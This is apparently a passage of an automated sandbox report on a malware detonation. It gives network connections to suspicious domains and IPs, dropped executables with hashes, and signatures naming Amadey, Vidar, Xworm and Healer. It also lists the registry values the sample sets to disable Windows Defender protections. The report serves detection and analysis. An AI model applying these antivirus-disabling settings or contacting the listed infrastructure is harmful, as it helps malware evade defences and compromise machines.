| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| N/A | 127.0.0.1:49884 | | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.152.202:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.169.46:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| N/A | 127.0.0.1:49892 | | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
Files
memory/2160-0-0x0000000000CD0000-0x000000000117B000-memory.dmp
memory/2160-1-0x0000000077400000-0x0000000077402000-memory.dmp
memory/2160-2-0x0000000000CD1000-0x0000000000CFF000-memory.dmp
memory/2160-3-0x0000000000CD0000-0x000000000117B000-memory.dmp
memory/2160-4-0x0000000000CD0000-0x000000000117B000-memory.dmp
memory/2160-5-0x0000000000CD0000-0x000000000117B000-memory.dmp
\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
| MD5 | 4cf553af549bd99fa44da57de08620a8 |
| SHA1 | 67e04f4434f0a63b082b0c8f148f5c100a77e27f |
| SHA256 | d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e |
| SHA512 | 4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186 |
memory/2668-18-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2160-16-0x0000000007410000-0x00000000078BB000-memory.dmp
memory/2160-15-0x0000000000CD0000-0x000000000117B000-memory.dmp
memory/2668-19-0x0000000000331000-0x000000000035F000-memory.dmp
memory/2668-20-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2668-22-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2616-43-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/2616-45-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2668-44-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cebf2b3e5d40ad431f50441119b70dbb |
| SHA1 | 1c96802eaf2a39fc9d5e3677beddf68aad829df2 |
| SHA256 | b842462014209ac29af76b937c305d3dcb75581155ad1a41e3b3e6fc0eebbe14 |
| SHA512 | ac690fd5b4192540c544d8cec9b30c831faef51275b6607f9b6a2c5586b1ea51acd06c1b184051345701f163729000f10e497687f9dbfcf1e246bf5420e6024c |
memory/1504-52-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/1504-51-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2668-53-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2668-54-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2668-55-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2668-56-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
| MD5 | 35a4dfb5f0308d20b1e5bf26e0a70509 |
| SHA1 | 0c72b35b74dadbce4a95c034968913de271aae06 |
| SHA256 | 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339 |
| SHA512 | 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9 |
memory/1488-69-0x00000000010C0000-0x0000000001FD4000-memory.dmp
memory/1488-70-0x000000001C280000-0x000000001CDE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dll32.exe
| MD5 | ffb5c5f8bab4598fada3bbf92d02d66d |
| SHA1 | ae8096c1f160c97874179ea878a61f69bfb9941a |
| SHA256 | f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1 |
| SHA512 | 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf |
memory/2300-76-0x0000000000E60000-0x0000000001416000-memory.dmp
\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll
| MD5 | 65ccd6ecb99899083d43f7c24eb8f869 |
| SHA1 | 27037a9470cc5ed177c0b6688495f3a51996a023 |
| SHA256 | aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4 |
| SHA512 | 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d |
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/2668-97-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd
| MD5 | c203adcd3b4b1717be1e79d7d234f89c |
| SHA1 | a0c726c32766f5d3e3de1bdc9998da2bb2a657e4 |
| SHA256 | bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8 |
| SHA512 | 724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368 |
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/2668-113-0x0000000000330000-0x00000000007DB000-memory.dmp
memory/2668-121-0x0000000006940000-0x0000000006DDB000-memory.dmp
memory/1040-124-0x0000000000CA0000-0x000000000113B000-memory.dmp
memory/2668-123-0x0000000006940000-0x0000000006DDB000-memory.dmp
memory/1040-129-0x0000000000CA0000-0x000000000113B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/2752-143-0x0000000000030000-0x00000000000A0000-memory.dmp
memory/2608-150-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-159-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-158-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2608-161-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-156-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-154-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-152-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2608-148-0x0000000000400000-0x0000000000466000-memory.dmp
memory/2668-167-0x0000000006940000-0x0000000006DDB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/2668-183-0x0000000006940000-0x0000000006DDB000-memory.dmp
memory/2324-186-0x00000000013B0000-0x00000000013C2000-memory.dmp
memory/2324-187-0x0000000000350000-0x0000000000360000-memory.dmp
memory/2668-188-0x0000000000330000-0x00000000007DB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat
| MD5 | 16b0f1ff4a568e2eaee5bc0f74b225ae |
| SHA1 | e93ca407f192f3394e62853508b47beaf69d4fb1 |
| SHA256 | 10ca88c5fa2dd89389b1e69c3f70f7b08342fd4e6771de4a9b888ef74f37b1a9 |
| SHA512 | d2c6241b0613d3f7bb7a47de97def1efffb0cc848aceb07b08131ba13f743299c5ef9b623a940d11d2c7dd68892cd85ecfb65c2c1b58d92db92221eb5548c118 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe
| MD5 | 0eb68c59eac29b84f81ad6522d396f59 |
| SHA1 | aacfdf3cb1bdd995f63584f31526b11874fc76a5 |
| SHA256 | dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f |
| SHA512 | 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar7288.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe
| MD5 | 7c169698effcdd45b7cbd763d28e87f5 |
| SHA1 | 4f9db666d66255cd7ca2b0973ff00eae8b155f7a |
| SHA256 | c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b |
| SHA512 | 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3 |
C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe
| MD5 | 2012699a5e85cd283323c324aa061bc7 |
| SHA1 | 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f |
| SHA256 | 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5 |
| SHA512 | 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683 |
C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe
| MD5 | e935a122d4c4e9c1b44368821a5154ff |
| SHA1 | c93e4b9fb9563cb04a9cd39c75220eaf6007f98f |
| SHA256 | 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4 |
| SHA512 | 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\b040a549-921e-44b7-903f-2d7e5a1a2d20
| MD5 | 40d41fab08c1b09f80d59994aaf56566 |
| SHA1 | 9c797aa1fa2c9271cee99af9a3942df2b1bd2ca8 |
| SHA256 | 90a83b1796a6acbc1da30e3fed79dd779dd4d8afeff12c44eb7f45798c4e18da |
| SHA512 | 5bec55689ded1ec596b68081c122a223d17bb86f6cfc343f2b00ab97ca709c6308e8f8cbb2c528684ac07961c1f16568a1060e437309969e25b0acee4d20c790 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\ac081f8f-04b0-45e0-9aac-e25e18c2e726
| MD5 | fda8d62c900d4eff4da53af4e0f43645 |
| SHA1 | c5b541077a678923978a2d33a6e7dcb6f7e3d101 |
| SHA256 | c4508a44ccc677828dbd163ad8f1aa9bb2fed8ed9a86ff69fc3b718cb69f3db0 |
| SHA512 | cc0065aec78e041a67e1973add7f87a383c253a96e523022dbff9ad9a71d921c2d6f168adc50bbb992c39ecb288904997ac161b05fdd6fc12fe6f1f5831c53e4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
| MD5 | a6d069317fac86dcea089645da03a774 |
| SHA1 | e3873b7e7c8256dba2a5c0ef73299fa3d6e10739 |
| SHA256 | b2ec2cf9504c6a1295211e3904f310ccc34199b1654189f9a5f74e179dad1e16 |
| SHA512 | da5166d1a9db655b2dddbfc7b8e8a8620c1932b4e7daa376d1e0a265270bc01d4fcb936c1070be21c924f3cfc9bd60acb5fc4225efbd249f9bf9a259fd3fe536 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | ae7c305a3c228d3cc12291c8adf2bfc4 |
| SHA1 | d88fb4c63a5c1eadc05c53a5f4fc78d463c482ab |
| SHA256 | 6364157ebedd296ceba1aebda06ede3524fed90fec7551cc656d92a7d578e79d |
| SHA512 | b54eb3d473651257faecbe0a28be7472b280b780d13aff61205c587ced20654580cc9ece95f3c2b4b71cd31b9e8d8083f8840bdb642f2e4ef8aac9e3f10765b7 |
C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe
| MD5 | e787e8998f5306a754d625d7e29bbeb5 |
| SHA1 | 14e056dbf0b3991664910ee3a1d23a4bb2c0253d |
| SHA256 | 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d |
| SHA512 | 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js
| MD5 | 13410ed1ef0840b0db333ebe922d6454 |
| SHA1 | 1e5a1ebc1bed46375f1cde5e09a8019f548ae8ae |
| SHA256 | 6271a6772f0cfad840b5459c6c2f8da0c7846f4349bef8111cf934ce5b4c3a35 |
| SHA512 | 8dc0c0d2e068edc9806a86f9caa7c0bfc9bd4d592c7a525cc900ab70221eb744c2653ff54e65aa0678fdcfbeb2c39af37eabca55d76b7c29a9f4587cb90059cd |
C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe
| MD5 | 745e4bcf3d176ea5e82a7c26a6733757 |
| SHA1 | 499cf0a28c9469faabae1e0f998c6a9b3e82862f |
| SHA256 | 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63 |
| SHA512 | bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d |
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0e8d437c8951e606b3221594a9993bdc |
| SHA1 | 8fa7d6483c0890e44c293d457cbf4b94045a5d59 |
| SHA256 | 56f571a7f447bd0b41c37d42479758481632de0cb2a33eadae1d0f4986c0b7c4 |
| SHA512 | 1db3048ae9444e855d0be53aea7ce40ee6e6e75561b7922409d0f9e44219487f6dcb10c0b239918625e1eeb58f5b93162c05e7b21082fc0bbe0cc19b8410ea8b |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:28
Reported
2025-03-05 22:30
Platform
win10v2004-20250217-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
